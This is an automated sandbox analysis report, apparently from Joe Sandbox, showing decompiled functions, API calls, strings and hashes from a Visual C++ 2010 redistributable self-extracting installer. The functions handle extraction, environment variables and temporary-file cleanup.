Instruction ID: ee85d7d4dc22db283b7cf7d6e356c1cdb43bb5f1116dac34ca54e1d5d0c69bec
Opcode Fuzzy Hash: ac494798e5bc9b3b8e97eb29fcbcefb1249f91a18fa69446e7f113a224a58319
Instruction Fuzzy Hash: C2D1F130A042859EFB678B6C98583FA7FE1AB42308F4A41D4DBC1DB2CACB754546C75A

Uniqueness

Uniqueness Score: -1.00%

Function 01003016 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 274
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01003016(signed int __edx, void* __edi, CHAR* _a4) {
				intOrPtr _v8;
				long _v100;
				long _v104;
				long _v196;
				short _v236;
				void _v256;
				long _v260;
				int _v264;
				signed char _v268;
				void* _v272;
				CHAR* _v276;
				signed int _v280;
				short* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __esi;
				intOrPtr _t91;
				void* _t93;
				int _t95;
				void* _t96;
				long _t97;
				void* _t100;
				intOrPtr _t103;
				signed short _t104;
				unsigned int _t105;
				void* _t110;
				long _t112;
				char* _t113;
				long _t117;
				long _t122;
				int _t125;
				long _t130;
				long _t132;
				signed char _t133;
				signed int _t134;
				void* _t135;
				short* _t136;
				signed char _t137;
				signed int _t139;
				signed char _t145;
				void* _t146;
				void* _t148;
				void* _t150;
				short* _t151;
				short* _t152;
				short* _t153;
				short* _t154;
				short* _t155;
				CHAR* _t156;
				signed char _t157;
				void* _t174;

				_t139 = __edx;
				_t91 =  *0x100c028; // 0xb636
				_v8 = _t91;
				_t93 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x10000000, 0); // executed
				_v272 = _t93;
				if(_t93 != 0xffffffff) {
					_push(_t146);
					_t95 = ReadFile(_t93,  &_v256, 0xf8,  &_v260, 0); // executed
					if(_t95 != 0 && _v260 == 0xf8) {
						if(_v256 != 0x5a4d) {
							L7:
							if(_v256 == 0x4550 && _v236 >= 0xe0 && _v104 != 0 && _v100 != 0 && _v100 <= 0x40000) {
								_t96 = RtlAllocateHeap( *0x100d078, 8, _v100); // executed
								_t148 = _t96;
								_v280 = _t148;
								if(_t148 != 0) {
									_t97 = SetFilePointer(_v272, _v104, 0, 0); // executed
									if(_t97 == _v104 && ReadFile(_v272, _t148, _v100,  &_v260, 0) != 0) {
										_t130 = _v100;
										if(_v260 == _t130) {
											_t100 = _t148;
											_v264 = _t130;
											_t174 = _t130 - 0x16;
											while(1) {
												_v268 = _t100;
												if(_t174 < 0) {
													break;
												}
												if( *_t100 != 0xc0) {
													L23:
													_t100 = _t100 + 1;
													_v264 = _v264 - 1;
													continue;
												} else {
													_push(4);
													_t139 = 0;
													asm("repe cmpsd");
													if(0 != 0) {
														goto L23;
													} else {
														_t132 =  *((intOrPtr*)(_t100 + 0x10));
														_v260 = _t132;
														if(_t132 < 0x16 || _t132 > _v264) {
															goto L23;
														} else {
															if(E01002FE1(0xffffffff, _t100, _t132) == 0) {
																_t133 = _v268;
																if((_t133 & 0x00000003) != 0) {
																	_t145 = _v280;
																	_t157 = _t145;
																	while(_v260 != 0) {
																		_v260 = _v260 - 1;
																		 *_t157 =  *_t133;
																		_t157 = _t157 + 1;
																		_t133 = _t133 + 1;
																	}
																	_v260 = _v260 - 1;
																	_v268 = _t145;
																	_t133 = _t145;
																}
																_t139 =  *(_t133 + 0x14) & 0x0000ffff;
																_t103 =  *((intOrPtr*)(_t133 + 0x10)) + _t133;
																_t134 = _t133 + 0x16;
																_v280 = _t139;
																_v288 = _t103;
																if(_t139 != 0) {
																	while(1) {
																		_t139 = _t134;
																		_t135 = _t134 + 4;
																		_v276 = _t139;
																		if(_t135 > _t103) {
																			goto L47;
																		}
																		_t104 =  *_t139;
																		if((_t104 & 0x00000001) == 0 && ( *(_t139 + 2) & 0x00000001) == 0) {
																			_t139 =  *(_t139 + 2) & 0x0000ffff;
																			_t105 = _t104 & 0x0000ffff;
																			_t150 = _t135;
																			_t136 = _t135 + _t105;
																			_v284 = _t136;
																			_t137 = _t136 + _t139;
																			_v268 = _t137;
																			if(_t137 <= _v288) {
																				 *((short*)(_t150 + (_t105 >> 1) * 2 - 2)) = 0;
																				 *((short*)(_v284 + ((_v276[2] & 0x0000ffff) >> 1) * 2 - 2)) = 0;
																				_t110 = 2;
																				_t151 = _t150 - _t110;
																				 *_t151 = 0x5f;
																				_t152 = _t151 - _t110;
																				 *_t152 = 0x58;
																				_t153 = _t152 - _t110;
																				 *_t153 = 0x46;
																				_t154 = _t153 - _t110;
																				 *_t154 = 0x53;
																				_t155 = _t154 - _t110;
																				 *_t155 = 0x5f;
																				_t112 = WideCharToMultiByte(0, 0, _t155, 0xffffffff, 0, 0, 0,  &_v264);
																				_v260 = _t112;
																				if(_t112 == 0 || _v264 != 0) {
																					L46:
																					_t87 =  &_v280;
																					 *_t87 = _v280 - 1;
																					if( *_t87 != 0) {
																						_t134 = _v268;
																						_t103 = _v288;
																						continue;
																					}
																				} else {
																					_t113 = HeapAlloc( *0x100d078, 8, _t112);
																					_v276 = _t113;
																					if(_t113 != 0) {
																						WideCharToMultiByte(0, 0, _t155, 0xffffffff, _t113, _v260, 0, 0);
																						if(GetEnvironmentVariableA(_v276, 0, 0) != 0) {
																							goto L46;
																						} else {
																							_t117 = WideCharToMultiByte(0, 0, _v284, 0xffffffff, 0, 0, 0,  &_v264);
																							_v260 = _t117;
																							if(_t117 == 0 || _v264 != 0) {
																								goto L46;
																							} else {
																								_t156 = HeapAlloc( *0x100d078, 8, _t117);
																								if(_t156 != 0) {
																									WideCharToMultiByte(0, 0, _v284, 0xffffffff, _t156, _v260, 0, 0);
																									SetEnvironmentVariableA(_v276, _t156);
																									goto L46;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L47;
																	}
																}
															} else {
																_t100 = _v268;
																goto L23;
															}
														}
													}
												}
												goto L47;
											}
										}
									}
								}
							}
						} else {
							_t122 = SetFilePointer(_v272, _v196, 0, 0); // executed
							if(_t122 == _v196) {
								_t125 = ReadFile(_v272,  &_v256, 0xf8,  &_v260, 0); // executed
								if(_t125 != 0 && _v260 == 0xf8) {
									goto L7;
								}
							}
						}
					}
					L47:
					_t93 = FindCloseChangeNotification(_v272); // executed
					_pop(_t146);
				}
				return E010062FF(_t93, 0, _v8, _t139, _t146);
			}

0x01003016
0x01003021
0x01003034
0x01003040
0x01003049
0x0100304f
0x01003055
0x01003073
0x01003077
0x01003092
0x010030e0
0x010030ea
0x01003129
0x0100312f
0x01003133
0x01003139
0x0100314a
0x01003153
0x01003175
0x0100317e
0x01003184
0x01003186
0x0100318c
0x010031dd
0x010031dd
0x010031e3
0x00000000
0x00000000
0x01003194
0x010031cf
0x010031cf
0x010031d0
0x00000000
0x01003196
0x01003196
0x010031a0
0x010031a2
0x010031a4
0x00000000
0x010031a6
0x010031a6
0x010031ac
0x010031b2
0x00000000
0x010031bc
0x010031c7
0x010031ea
0x010031f3
0x010031f5
0x010031fb
0x0100320b
0x010031ff
0x01003207
0x01003209
0x0100320a
0x0100320a
0x01003213
0x01003219
0x0100321f
0x0100321f
0x01003221
0x01003228
0x0100322a
0x0100322f
0x01003235
0x0100323b
0x01003255
0x01003255
0x01003257
0x0100325c
0x01003262
0x00000000
0x00000000
0x01003268
0x0100326d
0x0100327d
0x01003281
0x01003284
0x01003286
0x01003288
0x0100328e
0x01003296
0x0100329c
0x010032aa
0x010032bd
0x010032c2
0x010032c3
0x010032c5
0x010032ca
0x010032cc
0x010032d1
0x010032d3
0x010032d8
0x010032da
0x010032df
0x010032f0
0x010032f5
0x010032f9
0x010032ff
0x010033af
0x010033af
0x010033af
0x010033b5
0x01003249
0x0100324f
0x00000000
0x0100324f
0x01003311
0x0100331a
0x01003322
0x01003328
0x0100333c
0x0100334e
0x00000000
0x01003350
0x01003364
0x01003368
0x0100336e
0x00000000
0x01003378
0x01003387
0x0100338b
0x010033a0
0x010033a9
0x00000000
0x010033a9
0x0100338b
0x0100336e
0x0100334e
0x01003328
0x010032ff
0x0100329c
0x00000000
0x0100326d
0x01003255
0x010031c9
0x010031c9
0x00000000
0x010031c9
0x010031c7
0x010031b2
0x010031a4
0x00000000
0x01003194
0x010031e5
0x0100317e
0x01003153
0x01003139
0x01003094
0x010030a2
0x010030ae
0x010030ca
0x010030ce
0x00000000
0x00000000
0x010030ce
0x010030ae
0x01003092
0x010033bb
0x010033c1
0x010033c8
0x010033c8
0x010033d3

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,10000000,00000000), ref: 01003040
ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 01003073
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 010030A2
ReadFile.KERNELBASE(?,00005A4D,000000F8,?,00000000), ref: 010030CA
RtlAllocateHeap.NTDLL(00000008,00040000), ref: 01003129
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 0100314A
ReadFile.KERNEL32(?,00000000,00040000,?,00000000), ref: 0100316B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010032F5
HeapAlloc.KERNEL32(00000008,00000000), ref: 0100331A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0100333C
GetEnvironmentVariableA.KERNEL32(?,00000000,00000000), ref: 01003346
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01003364
HeapAlloc.KERNEL32(00000008,00000000), ref: 01003381
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010033A0
SetEnvironmentVariableA.KERNEL32(?,00000000), ref: 010033A9
FindCloseChangeNotification.KERNELBASE(?), ref: 010033C1

Strings

PE, xrefs: 010030E0

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$ByteCharMultiWide$HeapRead$AllocEnvironmentPointerVariable$AllocateChangeCloseCreateFindNotification
String ID: PE
API String ID: 558715291-4258593460
Opcode ID: 7a117e422b0a1a894acefd9d8880e513f77c58c962ccde61173d9d4eb82a6e9e
Instruction ID: bf8ad80c2da08c31ae0c339a365434081412969bf7389dda4636a4a9dec36aeb
Opcode Fuzzy Hash: 7a117e422b0a1a894acefd9d8880e513f77c58c962ccde61173d9d4eb82a6e9e
Instruction Fuzzy Hash: 55A15E71804128AFEB778B58CC85BE9FBB9FB14350F1481E9E689A6290DB714DC5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01002E53 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01002E53(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _t14;
				void* _t17;
				void* _t19;
				struct HWND__* _t24;

				if(_a8 == 0x10) {
					 *0x100ce04 = 0;
					EndDialog(_a4, 0);
					L14:
					_t14 = 1;
					L15:
					return _t14;
				}
				if(_a8 == 0x16) {
					if(_a12 == 0) {
						L12:
						_t14 = 0;
						goto L15;
					}
					SetEvent( *0x100cf24);
					_v12 = CreateEventW(0, 1, 0, L"Global\\HotfixNoShutDown");
					_t17 =  *0x100d04c; // 0x2b4
					_v8 = _t17;
					if(_v12 != 0 && _t17 != 0) {
						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
						CloseHandle(_v12);
					}
					E01002D78();
					_t19 =  *0x100d04c; // 0x2b4
					if(_t19 != 0) {
						TerminateProcess(_t19, 1);
					}
					goto L14;
				}
				if(_a8 != 0x110) {
					goto L12;
				}
				_t24 = _a4;
				 *0x100ce04 = _t24;
				if( *0x100c4b4 != 0) {
					 *0x100cf28 = SetParent(_t24, 0xfffffffd); // executed
					Sleep(0x1f4); // executed
				}
				SetEvent( *0x100cf2c);
				goto L14;
			}

0x01002e5f
0x01002f21
0x01002f27
0x01002f2d
0x01002f2f
0x01002f30
0x01002f32
0x01002f32
0x01002e69
0x01002eb5
0x01002f17
0x01002f17
0x00000000
0x01002f17
0x01002ebd
0x01002ed2
0x01002ed8
0x01002edd
0x01002ee0
0x01002eef
0x01002ef8
0x01002ef8
0x01002efe
0x01002f03
0x01002f0a
0x01002f0f
0x01002f0f
0x00000000
0x01002f0a
0x01002e72
0x00000000
0x00000000
0x01002e7f
0x01002e82
0x01002e87
0x01002e97
0x01002e9c
0x01002e9c
0x01002ea8
0x00000000

APIs

SetParent.USER32(?,000000FD), ref: 01002E8C
Sleep.KERNELBASE(000001F4), ref: 01002E9C
SetEvent.KERNEL32 ref: 01002EA8
SetEvent.KERNEL32 ref: 01002EBD
CreateEventW.KERNEL32(00000000,00000001,00000000,Global\HotfixNoShutDown), ref: 01002ECC
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01002EEF
CloseHandle.KERNEL32(?), ref: 01002EF8
TerminateProcess.KERNEL32(000002B4,00000001), ref: 01002F0F
EndDialog.USER32(?,00000000), ref: 01002F27

Strings

Global\HotfixNoShutDown, xrefs: 01002EC3

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: Event$CloseCreateDialogHandleMultipleObjectsParentProcessSleepTerminateWait
String ID: Global\HotfixNoShutDown
API String ID: 2160021069-3107748146
Opcode ID: 400348b860b79de6a0f3343453eb6026b643485889c826b2de8ec5d488a1a1e5
Instruction ID: 565771bbe1ded297f6e1eeab05adb2a6758b43a142e37d2f74b43153d2bd27e5
Opcode Fuzzy Hash: 400348b860b79de6a0f3343453eb6026b643485889c826b2de8ec5d488a1a1e5
Instruction Fuzzy Hash: D2219271405214EFFB339FA4DD0C9AE7FB5EB09751F00816AF695920C9D7BA8980CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010028D9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010028D9(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v268;
				signed int _v272;
				signed int _v276;
				int _v280;
				void* __ebx;
				void* __esi;
				intOrPtr _t23;
				signed int _t24;
				signed int _t27;
				signed int _t28;
				int _t33;
				CHAR* _t35;
				signed int _t42;
				intOrPtr _t48;
				void* _t49;
				void* _t50;

				_t23 =  *0x100c028; // 0xb636
				_v276 = _v276 & 0x00000000;
				_t49 = SetErrorMode;
				_t48 = _a4;
				_v8 = _t23;
				_t24 = SetErrorMode(0); // executed
				_v280 = _t24;
				SetErrorMode(_t24 | 0x00000001); // executed
				_t27 = GetTickCount();
				_v272 = _v272 & 0x00000000;
				_t42 = _t27;
				while(1) {
					_t28 = _t42;
					_t46 = _t28 % 0xf4240;
					sprintf( &_v268, "%s_%06u_", _t48, _t28 % 0xf4240);
					_t50 = _t50 + 0x10;
					_t42 = _t42 + 1; // executed
					_t33 = CreateDirectoryA( &_v268, 0); // executed
					if(_t33 != 0) {
						break;
					}
					if(GetLastError() == 0xb7) {
						_v272 = _v272 + 1;
						if(_v272 < 0x3e8) {
							continue;
						} else {
						}
					}
					L8:
					SetErrorMode(_v280); // executed
					return E010062FF(_v276, _t42, _v8, _t46, _t49);
				}
				_t35 = RemoveDirectoryA( &_v268); // executed
				if(_t35 == 0) {
					MoveFileExA( &_v268, _t35, 4);
				}
				_v276 = 1;
				goto L8;
			}

0x010028e4
0x010028e9
0x010028f2
0x010028f9
0x010028fe
0x01002901
0x01002903
0x0100290d
0x0100290f
0x01002915
0x0100291c
0x0100291e
0x01002925
0x01002927
0x01002937
0x0100293d
0x01002949
0x0100294a
0x01002952
0x00000000
0x00000000
0x0100295f
0x01002961
0x01002971
0x00000000
0x00000000
0x01002973
0x01002971
0x010029a0
0x010029a6
0x010029ba
0x010029ba
0x0100297c
0x01002984
0x01002990
0x01002990
0x01002996
0x00000000

APIs

SetErrorMode.KERNELBASE(00000000), ref: 01002901
SetErrorMode.KERNELBASE(00000000), ref: 0100290D
GetTickCount.KERNEL32 ref: 0100290F
sprintf.MSVCRT ref: 01002937
CreateDirectoryA.KERNELBASE(?,00000000), ref: 0100294A
GetLastError.KERNEL32 ref: 01002954
RemoveDirectoryA.KERNELBASE(?), ref: 0100297C
MoveFileExA.KERNEL32 ref: 01002990
SetErrorMode.KERNELBASE(?), ref: 010029A6

Strings

%s_%06u_, xrefs: 01002931

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: Error$Mode$Directory$CountCreateFileLastMoveRemoveTicksprintf
String ID: %s_%06u_
API String ID: 2138407651-2224866286
Opcode ID: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
Instruction ID: 2b5bf619bf93649879f906ab2fef4dd1de3e953bea1c10fa8e68832a185b186a
Opcode Fuzzy Hash: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
Instruction Fuzzy Hash: AC2162719002189BEB22DB64CC4DBDA77BEEB54341F0040A6E685E2181D7B99A84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010037BF Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010037BF(void* __ecx) {
				long _v8;
				int _t4;
				int _t9;
				void* _t16;

				_t4 = GetEnvironmentVariableA("_SFX_CAB_SHUTDOWN_REQUEST", 0, 0);
				if(_t4 == 0) {
					E01002BC4("c:\4863269369430a9b27", "$shtdwn$.req", 0x100d2c0);
					_t4 = CreateFileA(0x100d2c0, 0xc0000000, 3, 0, 1, 0x4000002, 0); // executed
					_t16 = _t4;
					 *0x100c020 = _t16;
					if(_t16 != 0xffffffff) {
						 *0x100cad0 = memset(0x100c8c0, 0, 0xc5 << 2);
						 *0x100c8c0 = 0x6e776453;
						 *0x100c8c4 = 0x10000;
						 *0x100c8c8 = 0xc0000013; // executed
						_t9 = WriteFile(_t16, 0x100c8c0, 0x314,  &_v8, 0); // executed
						if(_t9 == 0 || _v8 != 0x314) {
							_t4 = CloseHandle( *0x100c020);
							 *0x100c020 =  *0x100c020 | 0xffffffff;
						} else {
							_t4 = SetEnvironmentVariableA("_SFX_CAB_SHUTDOWN_REQUEST", 0x100d2c0);
						}
					}
				}
				return _t4;
			}

0x010037cf
0x010037d7
0x010037ee
0x01003804
0x0100380a
0x0100380f
0x01003815
0x01003829
0x0100383a
0x01003844
0x0100384e
0x01003858
0x01003861
0x0100387c
0x01003882
0x01003868
0x0100386e
0x0100386e
0x01003861
0x01003889
0x0100388c

APIs

GetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,00000000,00000000), ref: 010037CF
CreateFileA.KERNELBASE(c:\4863269369430a9b27\$shtdwn$.req,C0000000,00000003,00000000,00000001,04000002,00000000), ref: 01003804
WriteFile.KERNELBASE(00000000,Sdwn,00000314,?,00000000), ref: 01003858
SetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,c:\4863269369430a9b27\$shtdwn$.req), ref: 0100386E
CloseHandle.KERNEL32 ref: 0100387C

Strings

Sdwn, xrefs: 0100381A, 01003838
c:\4863269369430a9b27\$shtdwn$.req, xrefs: 010037DE, 010037E3, 01003803, 01003868
c:\4863269369430a9b27, xrefs: 010037E9
$shtdwn$.req, xrefs: 010037E4
_SFX_CAB_SHUTDOWN_REQUEST, xrefs: 010037CA, 01003869

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: EnvironmentFileVariable$CloseCreateHandleWrite
String ID: $shtdwn$.req$Sdwn$_SFX_CAB_SHUTDOWN_REQUEST$c:\4863269369430a9b27$c:\4863269369430a9b27\$shtdwn$.req
API String ID: 510931695-2907076516
Opcode ID: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
Instruction ID: b0220b2b77477a676319b82448efaae5af67ee2cc9e6961861700f30aa540367
Opcode Fuzzy Hash: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
Instruction Fuzzy Hash: C8116D71604340ABF7338B9AAD4DF473AA9F786764F1043A9F1C1A61C8D7765641C770

Uniqueness

Uniqueness Score: -1.00%

Function 01002D78 Relevance: 15.1, APIs: 10, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01002D78() {
				void* _t9;
				void* _t10;
				CHAR* _t11;
				intOrPtr* _t17;
				intOrPtr* _t18;

				EnterCriticalSection(0x100d060);
				_t9 =  *0x100c4a4; // 0x0
				if(_t9 != 0) {
					CloseHandle(_t9);
					 *0x100c4a4 =  *0x100c4a4 & 0x00000000;
				}
				_t10 =  *0x100c020; // 0xffffffff
				if(_t10 != 0xffffffff) {
					_t11 = CloseHandle(_t10);
					 *0x100c020 =  *0x100c020 | 0xffffffff;
				}
				_t17 =  *0x100c004; // 0x47fa68
				while(_t17 != 0x100c004) {
					_t11 =  *(_t17 + 4);
					if(_t11 != 0) {
						_t11 = DeleteFileA(_t11); // executed
						if(_t11 == 0) {
							_t11 = GetLastError();
							if(_t11 != 2 && _t11 != 3) {
								_t11 = MoveFileExA( *(_t17 + 4), 0, 4);
							}
						}
						 *(_t17 + 4) =  *(_t17 + 4) & 0x00000000;
					}
					_t17 =  *_t17;
				}
				_t18 =  *0x100c00c; // 0x47f8e8
				while(_t18 != 0x100c00c) {
					_t11 =  *(_t18 + 4);
					if(_t11 != 0) {
						_t11 = RemoveDirectoryA(_t11); // executed
						if(_t11 == 0) {
							_t11 = GetLastError();
							if(_t11 != 2 && _t11 != 3) {
								_t11 = MoveFileExA( *(_t18 + 4), 0, 4);
							}
						}
						 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
					}
					_t18 =  *_t18;
				}
				LeaveCriticalSection(0x100d060);
				return _t11;
			}

0x01002d82
0x01002d88
0x01002d95
0x01002d98
0x01002d9a
0x01002d9a
0x01002da1
0x01002da9
0x01002dac
0x01002dae
0x01002dae
0x01002db5
0x01002df9
0x01002dc8
0x01002dcd
0x01002dd0
0x01002dd8
0x01002dda
0x01002de3
0x01002df1
0x01002df1
0x01002de3
0x01002df3
0x01002df3
0x01002df7
0x01002df7
0x01002dfd
0x01002e3b
0x01002e0a
0x01002e0f
0x01002e12
0x01002e1a
0x01002e1c
0x01002e25
0x01002e33
0x01002e33
0x01002e25
0x01002e35
0x01002e35
0x01002e39
0x01002e39
0x01002e44
0x01002e4d

APIs

EnterCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002D82
CloseHandle.KERNEL32(00000000,?,?,?,01003914), ref: 01002D98
CloseHandle.KERNEL32(FFFFFFFF,?,?,?,01003914), ref: 01002DAC
DeleteFileA.KERNELBASE(?,?,?,?,01003914), ref: 01002DD0
GetLastError.KERNEL32(?,?,?,01003914), ref: 01002DDA
MoveFileExA.KERNEL32 ref: 01002DF1
RemoveDirectoryA.KERNELBASE(?,?,?,?,01003914), ref: 01002E12
GetLastError.KERNEL32(?,?,?,01003914), ref: 01002E1C
MoveFileExA.KERNEL32 ref: 01002E33
LeaveCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002E44

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$CloseCriticalErrorHandleLastMoveSection$DeleteDirectoryEnterLeaveRemove
String ID:
API String ID: 3032557604-0
Opcode ID: 2a2974ac5940014a36d8b734e7ae464734aed0013697c2f22aefec969e3d7cea
Instruction ID: eaeb66f063d6c446da59646d057841921a657097434ac8a43aedc69f3ce3f5a1
Opcode Fuzzy Hash: 2a2974ac5940014a36d8b734e7ae464734aed0013697c2f22aefec969e3d7cea
Instruction Fuzzy Hash: 9E219F316403409BF6B3DB58DA4DB1A7BAAEB04721F164595F6D6E31C5C739EC00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010063FF Relevance: 13.6, APIs: 9, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t34;
				void _t36;
				int _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				signed int _t52;
				signed int _t53;
				int _t57;
				void* _t58;

				_push(0x28);
				_push(0x10025e0);
				E010065B8(__ebx, __edi, __esi);
				if( *0x1000000 != 0x5a4d) {
					L4:
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				} else {
					_t45 =  *0x100003c; // 0xe0
					if( *((intOrPtr*)(_t45 + 0x1000000)) != 0x4550) {
						goto L4;
					} else {
						_t2 = _t45 + 0x1000018; // 0xa07010b
						_t52 =  *_t2 & 0x0000ffff;
						if(_t52 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t45 + 0x1000074)) - 0xe;
							if( *((intOrPtr*)(_t45 + 0x1000074)) <= 0xe) {
								goto L4;
							} else {
								_t53 = 0;
								__eflags =  *(_t45 + 0x10000e8);
								goto L9;
							}
						} else {
							if(_t52 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t45 + 0x1000084)) - 0xe;
								if( *((intOrPtr*)(_t45 + 0x1000084)) <= 0xe) {
									goto L4;
								} else {
									_t53 = 0;
									__eflags =  *(_t45 + 0x10000f8);
									L9:
									_t10 = __eflags != 0;
									__eflags = _t10;
									 *(_t58 - 0x1c) = _t53 & 0xffffff00 | _t10;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				__set_app_type(1);
				 *0x101d3ec =  *0x101d3ec | 0xffffffff;
				 *0x101d3f0 =  *0x101d3f0 | 0xffffffff;
				_t30 = __p__fmode();
				_t48 =  *0x100c390; // 0x0
				 *_t30 = _t48;
				_t31 = __p__commode();
				_t49 =  *0x100c38c; // 0x0
				 *_t31 = _t49;
				 *0x101d3f4 =  *_adjust_fdiv;
				_t34 = E01003783();
				if( *0x100c02c == 0) {
					__setusermatherr(E01003783);
				}
				E010065A1(_t34);
				_push(0x1002218);
				_push(0x1002214);
				L01006596();
				_t36 =  *0x100c388; // 0x0
				 *(_t58 - 0x24) = _t36;
				 *(_t58 - 0x34) = __getmainargs(_t58 - 0x2c, _t58 - 0x28, _t58 - 0x20,  *0x100c384, _t58 - 0x24);
				_push(0x1002210);
				_push(0x1002208);
				L01006596();
				_t42 =  *(_t58 - 0x20);
				 *__imp____initenv = _t42;
				_push( *(_t58 - 0x20));
				_push( *(_t58 - 0x28));
				_push( *(_t58 - 0x2c));
				L01005E92(); // executed
				_t57 = _t42;
				 *(_t58 - 0x38) = _t57;
				if( *(_t58 - 0x1c) == 0) {
					exit(_t57);
				}
				__imp___cexit();
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				return E010065F3(_t57);
			}

0x010063ff
0x01006401
0x01006406
0x01006414
0x0100643e
0x0100643e
0x01006416
0x01006416
0x01006425
0x00000000
0x01006427
0x01006427
0x01006427
0x01006434
0x01006457
0x0100645e
0x00000000
0x01006460
0x01006460
0x01006462
0x00000000
0x01006462
0x01006436
0x0100643c
0x01006444
0x0100644b
0x00000000
0x0100644d
0x0100644d
0x0100644f
0x01006468
0x01006468
0x01006468
